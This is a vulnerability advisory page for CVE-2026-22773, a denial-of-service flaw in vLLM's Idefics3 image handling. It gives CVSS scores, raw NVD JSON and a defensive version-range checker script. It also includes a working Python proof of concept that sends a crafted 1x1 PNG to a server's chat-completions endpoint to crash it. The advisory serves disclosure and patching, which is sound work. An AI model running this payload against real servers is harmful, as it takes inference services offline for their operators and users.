Security Vulnerability Report
CVE-2026-22773 CVSS 6.5 MEDIUM

CVE-2026-22773

Published: 2026-01-10 07:16:04
Last Modified: 2026-01-27 21:03:47

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-770 (Allocation of Resources Without Limits or Throttling)

Note: the 6.5 MEDIUM score is the secondary (advisory-source) assessment, which assumes low privileges (PR:L). The NVD primary assessment in the raw JSON below rates the same availability impact with no privileges required (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), giving 7.5 HIGH; deployments that expose the inference endpoint without authentication should plan remediation against the higher score.

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM 0.6.4 <= version < 0.12.0
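The affected range above is the kind of check a fleet inventory script has to get right: the lower bound is inclusive, the upper bound is exclusive, and a loose string comparison would misplace 0.12.0 or a pre-release tag. The following is an added example, not code from the advisory or from the vLLM project, that applies the NVD `configurations` block from this record to a deployed version string. It assumes the simple OR / non-negated node shape this record uses (AND-combined or negated nodes are rejected) and that pre-release suffixes such as `rc1` can be ignored for a range check.

```python
"""Added example: check a deployed vLLM version against the NVD affected
range for CVE-2026-22773. Not advisory or vLLM project code."""
import re
from typing import Optional, Tuple

# Constructed from the "configurations" entry in this record's raw JSON.
NVD_CONFIGURATIONS = [
    {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [{
        "vulnerable": True,
        "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*",
        "versionStartIncluding": "0.6.4",
        "versionEndExcluding": "0.12.0",
    }]}]}
]

# Leading numeric dotted part of a version; an optional "v" prefix is tolerated.
_VERSION_RE = re.compile(r"^v?(\d+(?:\.\d+)*)")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '0.11.2', 'v0.12.1' or '0.11.2rc1' into a comparable int tuple.
    Assumption: pre-release/local suffixes are dropped, which is adequate for
    a range check but would treat 0.12.0rc1 as 0.12.0 (i.e. as fixed)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    # Pad to three components so that 0.12 compares equal to 0.12.0.
    return parts + (0,) * max(0, 3 - len(parts))


def cpe_fields(criteria: str) -> Tuple[str, str, str]:
    """Return (vendor, product, version) from a CPE 2.3 formatted string:
    cpe:2.3:<part>:<vendor>:<product>:<version>:..."""
    fields = criteria.split(":")
    if len(fields) < 6 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 string: {criteria!r}")
    return fields[3], fields[4], fields[5]


def match_in_range(match: dict, version: Tuple[int, ...]) -> bool:
    """Apply the four optional NVD range bounds of one cpeMatch entry."""
    lo_inc: Optional[str] = match.get("versionStartIncluding")
    lo_exc: Optional[str] = match.get("versionStartExcluding")
    hi_inc: Optional[str] = match.get("versionEndIncluding")
    hi_exc: Optional[str] = match.get("versionEndExcluding")
    if lo_inc and version < parse_version(lo_inc):
        return False
    if lo_exc and version <= parse_version(lo_exc):
        return False
    if hi_inc and version > parse_version(hi_inc):
        return False
    if hi_exc and version >= parse_version(hi_exc):
        return False
    return True


def is_affected(vendor: str, product: str, version_str: str,
                configurations=NVD_CONFIGURATIONS) -> bool:
    """True if (vendor, product, version) falls inside a vulnerable cpeMatch.
    Assumption: only OR, non-negated nodes are handled; anything else raises
    so that a platform-dependent record is never silently reported as safe."""
    version = parse_version(version_str)
    for config in configurations:
        for node in config["nodes"]:
            if node.get("operator") != "OR" or node.get("negate"):
                raise NotImplementedError("only simple OR nodes are supported")
            for match in node["cpeMatch"]:
                if not match.get("vulnerable"):
                    continue
                cpe_vendor, cpe_product, cpe_version = cpe_fields(match["criteria"])
                if (cpe_vendor, cpe_product) != (vendor, product):
                    continue
                # A concrete version in the CPE itself must match exactly.
                if cpe_version not in ("*", "-") and parse_version(cpe_version) != version:
                    continue
                if match_in_range(match, version):
                    return True
    return False


if __name__ == "__main__":
    for v in ("0.6.3", "0.6.4", "0.11.2rc1", "0.12.0", "v0.12.1"):
        print(f"vllm {v}: {'AFFECTED' if is_affected('vllm', 'vllm', v) else 'not affected'}")
```

Running the module prints one line per sample version; in inventory use, feed it the `configurations` array fetched from NVD for each CVE of interest and the version reported by `pip show vllm` (or the image tag) on every serving host.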

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22773 PoC - vLLM Idefics3 DoS via 1x1 pixel image

This PoC demonstrates the denial of service vulnerability in vLLM's
Idefics3 model implementation.
"""
import base64
import json
import requests


def create_1x1_pixel_image():
    """Create a minimal 1x1 pixel PNG image (1x1 transparent pixel)"""
    # Minimal valid PNG: 1x1 transparent pixel
    png_data = base64.b64decode(
        'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg=='
    )
    return png_data


def exploit_vllm_dos(target_url, model_name):
    """
    Send a crafted 1x1 pixel image to trigger the DoS vulnerability

    Args:
        target_url: Base URL of vLLM server (e.g., 'http://localhost:8000')
        model_name: Name of the Idefics3 model in service
    """
    headers = {
        'Content-Type': 'application/json'
    }

    # Create the 1x1 pixel image
    image_bytes = create_1x1_pixel_image()
    image_base64 = base64.b64encode(image_bytes).decode('utf-8')

    # Construct request payload for multimodal inference
    payload = {
        'model': model_name,
        'messages': [
            {
                'role': 'user',
                'content': [
                    {
                        'type': 'text',
                        'text': 'Describe this image briefly.'
                    },
                    {
                        'type': 'image_url',
                        'image_url': {
                            'url': f'data:image/png;base64,{image_base64}'
                        }
                    }
                ]
            }
        ],
        'max_tokens': 100,
        'temperature': 0.7
    }

    try:
        response = requests.post(
            f'{target_url}/v1/chat/completions',
            headers=headers,
            json=payload,
            timeout=30
        )
        print(f'Response status: {response.status_code}')
        print(f'Response: {response.text}')
    except requests.exceptions.RequestException as e:
        print(f'Request failed (service may have crashed): {e}')


if __name__ == '__main__':
    import sys

    if len(sys.argv) < 3:
        print('Usage: python cve_2026_22773_poc.py <vllm_url> <model_name>')
        print('Example: python cve_2026_22773_poc.py http://localhost:8000 idefics3-8b')
        sys.exit(1)

    target = sys.argv[1]
    model = sys.argv[2]

    print(f'Targeting vLLM at {target} with model {model}')
    print('Sending crafted 1x1 pixel image...')
    exploit_vllm_dos(target, model)

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22773",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T07:16:03.527",
    "lastModified": "2026-01-27T21:03:47.017",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0."
      },
      {
        "lang": "es",
        "value": "vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLMs). En versiones desde la 0.6.4 hasta antes de la 0.12.0, los usuarios pueden colapsar el motor vLLM que sirve modelos multimodales que utilizan la implementación del modelo de visión Idefics3 enviando una imagen de 1x1 píxel especialmente diseñada. Esto causa un desajuste de dimensión de tensor que resulta en un error de tiempo de ejecución no manejado, lo que lleva a la terminación completa del servidor. Este problema ha sido parcheado en la versión 0.12.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-770"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "0.6.4",
                "versionEndExcluding": "0.12.0",
                "matchCriteriaId": "824D7904-D175-4B2E-A661-EBCA035697DC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}